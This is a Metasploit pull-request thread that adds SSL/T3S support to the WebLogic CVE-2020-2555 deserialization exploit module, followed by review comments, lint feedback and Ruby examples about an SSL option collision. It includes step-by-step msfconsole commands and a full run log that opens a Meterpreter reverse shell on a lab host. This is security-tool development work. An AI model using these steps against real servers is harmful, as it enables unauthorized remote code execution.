metasploit-framework
Weblogic t3s support
All of the T3 WebLogic exploits fail over T3S, even though they can support it. This PR enables support on the first of them; I'll raise further PRs for the other exploits when I've completed testing across the suite and any comments are addressed in this branch (if the changes are wanted at all).
Verification
List the steps needed to make sure this thing works
- [ ] Start `msfconsole`
- [ ] `use exploit/multi/misc/weblogic_deserialize_badattrval`
- [ ] `set RPORT 7002`
- [ ] `set SSL true`
- [ ] `run`
Evidence
```
msf6 exploit(multi/misc/weblogic_deserialize_badattrval) > show info

       Name: WebLogic Server Deserialization RCE - BadAttributeValueExpException
     Module: exploit/multi/misc/weblogic_deserialize_badattrval
   Platform: Unix, Linux, Windows
       Arch: x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2020-01-15

Provided by:
  Jang
  Y4er
  Shelby Pace
  Steve Embling

Available targets:
  Id  Name
  --  ----
  0   Windows
  1   Unix

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOSTS   192.168.59.2     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT    7002             yes       The target port (TCP)
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT  8080             yes       The local port to listen on.
  SSL      true             no        Negotiate SSL for incoming connections
  SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                   no        The URI to use for this exploit (default is random)

Payload information:

Description:
  There exists a Java object deserialization vulnerability in multiple
  versions of WebLogic. Unauthenticated remote code execution can be
  achieved by sending a serialized BadAttributeValueExpException
  object over the T3 protocol to vulnerable WebLogic servers.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2020-2555
  https://www.thezdi.com/blog/2020/3/5/cve-2020-2555-rce-through-a-deserialization-bug-in-oracles-weblogic-server
  https://github.com/Y4er/CVE-2020-2555

View the full module info with the info -d command.

msf6 exploit(multi/misc/weblogic_deserialize_badattrval) > show options

Module options (exploit/multi/misc/weblogic_deserialize_badattrval):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS   192.168.59.2     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    7002             yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      true             no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.59.243   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   1   Unix

View the full module info with the info, or info -d command.

msf6 exploit(multi/misc/weblogic_deserialize_badattrval) > run

[*] Started reverse TCP handler on 192.168.59.243:4444
[*] 192.168.59.2:7002 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.59.2:7002 - WebLogic version detected: 12.1.3.0.0
[+] 192.168.59.2:7002 - The target appears to be vulnerable.
[*] 192.168.59.2:7002 - Sending handshake...
[*] 192.168.59.2:7002 - Formatting payload...
[*] 192.168.59.2:7002 - Sending object...
[*] Sending stage (1017704 bytes) to 192.168.59.2
[*] 192.168.59.2:7002 - Command Stager progress - 101.56% done (717/706 bytes)
[*] Meterpreter session 16 opened (192.168.59.243:4444 -> 192.168.59.2:35646) at 2023-01-09 18:59:19 +0000

meterpreter >
```
Additional comment to add: it looks like there might be a collision between the exploit modules both setting the "SSL" option, making it pretty misleading/confusing and possibly not as granular as intended.

https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/lib/msf/core/exploit/remote/tcp.rb#L65

vs

https://github.com/rapid7/metasploit-framework/blob/03d645016c8f5c957870fcc0eb45460cefa5d7e2/lib/msf/core/exploit/remote/tcp_server.rb#L21

So the info says it's setting on "incoming connections", but it looks like both incoming and outgoing might be using the same. I take it this is a known issue, or does it need raising?
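The collision described in the comment above, as an added example that is not Metasploit's own code: a minimal model of two mixins that each register a datastore option called `SSL`, showing that the option table can only hold one description for the key and that both the outgoing connection and the incoming listener end up reading the same value. `OptBool`, `ModuleOptions`, the three mixin modules and the `ServeSSL` name are simplified stand-ins for illustration (the real `Msf::OptBool` / `register_options` API is not reproduced here); the registration order is arranged so the server-side description wins, which matches the "incoming connections" text shown in the evidence above.

```ruby
# Added example, not Metasploit code. Models an option-name collision between
# a client-side and a server-side mixin, and the fix of using a distinct key.

# Stand-in for a boolean option definition: name, default and description.
OptBool = Struct.new(:name, :default, :desc)

# Stand-in for a module's option table plus datastore. Registration is
# last-writer-wins on the option name, which is what hides the collision:
# the table keeps one entry and therefore one description.
class ModuleOptions
  attr_reader :table, :datastore

  def initialize
    @table = {}      # name => OptBool (last registration wins)
    @datastore = {}  # name => value chosen by the operator
  end

  def register(opt)
    @table[opt.name] = opt
    @datastore[opt.name] = opt.default unless @datastore.key?(opt.name)
  end

  def set(name, value)
    @datastore[name] = value
  end

  def description(name)
    @table[name] && @table[name].desc
  end
end

# Client side: the outgoing connection to the target reads 'SSL'.
module ClientMixin
  def self.register(opts)
    opts.register(OptBool.new('SSL', false, 'Negotiate SSL/TLS for outgoing connections'))
  end

  def self.outgoing_tls?(opts)
    opts.datastore['SSL']
  end
end

# Server side with the colliding name: the listener reads the same 'SSL' key.
module CollidingServerMixin
  def self.register(opts)
    opts.register(OptBool.new('SSL', false, 'Negotiate SSL for incoming connections'))
  end

  def self.incoming_tls?(opts)
    opts.datastore['SSL']
  end
end

# Server side with its own key ('ServeSSL' is a hypothetical name), so the
# listener's TLS setting no longer rides on the client's.
module SeparatedServerMixin
  def self.register(opts)
    opts.register(OptBool.new('ServeSSL', false, 'Negotiate SSL for incoming connections'))
  end

  def self.incoming_tls?(opts)
    opts.datastore['ServeSSL']
  end
end

# Operator intent: TLS to the target (T3S) but a plain listener. With one
# shared key that intent cannot be expressed; both sides follow 'SSL'.
def colliding_module(target_tls: true)
  opts = ModuleOptions.new
  ClientMixin.register(opts)
  CollidingServerMixin.register(opts) # overwrites the 'SSL' description
  opts.set('SSL', target_tls)
  {
    description: opts.description('SSL'),
    outgoing: ClientMixin.outgoing_tls?(opts),
    incoming: CollidingServerMixin.incoming_tls?(opts)
  }
end

# Same intent with separate keys: each side is controlled independently and
# the option table documents both.
def separated_module(target_tls: true, listener_tls: false)
  opts = ModuleOptions.new
  ClientMixin.register(opts)
  SeparatedServerMixin.register(opts)
  opts.set('SSL', target_tls)
  opts.set('ServeSSL', listener_tls)
  {
    options: opts.table.keys.sort,
    outgoing: ClientMixin.outgoing_tls?(opts),
    incoming: SeparatedServerMixin.incoming_tls?(opts)
  }
end
```

Running `colliding_module` shows the shape of the problem: the only description left in the table is the server's, yet the client connection also honours the value, so an operator reading `show options` is told the flag affects incoming connections while it silently governs the outgoing T3 handshake as well.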
Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. This can be run from the root directory of Metasploit:

```
rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>
```

You can automate most of these changes with the -a flag:

```
rubocop -a <directory or file>
```

Please update your branch after these have been made, and reach out if you have any problems.
All but one pre-existing lint issue have already been addressed as far as I can tell. Lint docs say "Notes" should only apply to new modules, and this isn't a new module, so I'm not sure this should be blocked on that basis? My time on this didn't extend to the Notes field from the original exploit, but if you were asking me to take an educated guess from what I've seen it would be:

- CRASH_SAFE
- IOC_IN_LOGS
- REPEATABLE_SESSION

But did you want me to add those as a best effort, or should this be blocked until an authoritative source comes along?
Regarding the datastore SSL option: I've run into that before; it's a mess to clean up.

@MetasploitTeam: what do folks think about changing the server mixin's DS option to ServeSSL or similar?
@steve-embling Sorry for the delay on this; not sure how it slipped through the cracks.

Adding those notes you gave in https://github.com/rapid7/metasploit-framework/pull/17458#issuecomment-1377565329 would be great, as well as fixing this line:

```
C:121: 26: [Correctable] Style/AndOr: Use || instead of or.
```

I've just sent a final question to one of the developers that might have fixed the .get_once issue you ran into with SSL :+1: Or, if you're able to rebase against the latest master code to verify whether the change is still required or not, we could use that result to decide if the line can be reverted or not and get the PR landed faster 😄
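Why the `Style/AndOr` finding quoted above is worth fixing rather than silencing, as an added example that is not part of the PR: in Ruby, `or` binds more loosely than `=`, so `x = a or b` assigns `a` and then discards the result of the `or`. In a TLS-related decision that can quietly turn a "use TLS if either condition holds" check into "use TLS only if the first condition holds". The function names and inputs here are constructed for illustration.

```ruby
# Added example, not Metasploit code: the precedence difference between
# `or` and `||` that Rubocop's Style/AndOr cop guards against.

# Written with `or`: Ruby parses this as
#   (use_tls = explicit_flag) or port_is_tls
# so the assignment happens first and the second operand is thrown away.
def tls_with_or(explicit_flag, port_is_tls)
  use_tls = explicit_flag or port_is_tls
  use_tls
end

# Written with `||`: Ruby parses this as
#   use_tls = (explicit_flag || port_is_tls)
# so the assigned value reflects both conditions, as the author intended.
def tls_with_pipes(explicit_flag, port_is_tls)
  use_tls = explicit_flag || port_is_tls
  use_tls
end
```

With an explicit flag of `false` and a port that is known to be TLS, the `or` version returns `false` and the `||` version returns `true`; the two only agree when the first operand is already truthy, which is why the bug is easy to miss in testing.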
As an aside, I'm now trying to port these changes over to the other modules, but something between January and now seems to have broken the changes in most of the other modules. I wonder if it's the get/get_once changes.

It may also be something purely environmental on my end, mind.
Code changes look good from a static code analysis point of view, thanks! :+1:
Release Notes
Updates the exploit/multi/misc/weblogic_deserialize_badattrval module to enable support for SSL/TLS